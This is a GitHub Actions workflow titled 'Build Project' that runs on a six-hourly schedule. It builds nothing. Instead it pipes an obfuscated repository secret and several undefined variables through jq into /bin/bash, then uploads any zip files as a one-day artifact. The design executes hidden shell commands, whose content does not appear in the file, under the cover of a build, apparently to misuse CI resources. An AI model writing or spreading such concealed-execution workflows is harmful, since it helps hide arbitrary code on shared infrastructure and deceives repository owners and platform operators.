name: Build Project
on:
  workflow_dispatch:

  schedule:
    - cron: '47 0,6,12,18 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  service:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Run
        env:
          g85332: ${{ secrets.g85332 }}
        run: |
          printf '%s' "$g85332" | jq -r .j0 | /bin/bash
          echo $lw86 | jq -r .naa2 | /bin/bash
          echo $dk357 | jq -r .rr8 | /bin/bash
          printf '%s' "$uzfi30" | jq -r .gls8 | /bin/bash
          echo $c7 | jq -r .ii77 | /bin/bash
          echo $dsy87 | jq -r .wwt9852 | /bin/bash

      - name: Save archive
        uses: actions/upload-artifact@v4
        with:
          name: pVDMKkiX
          path: "*.zip"
          retention-days: 1
